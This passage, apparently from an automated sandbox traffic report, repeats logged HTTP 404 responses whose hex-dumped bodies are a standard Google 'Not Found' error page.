70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 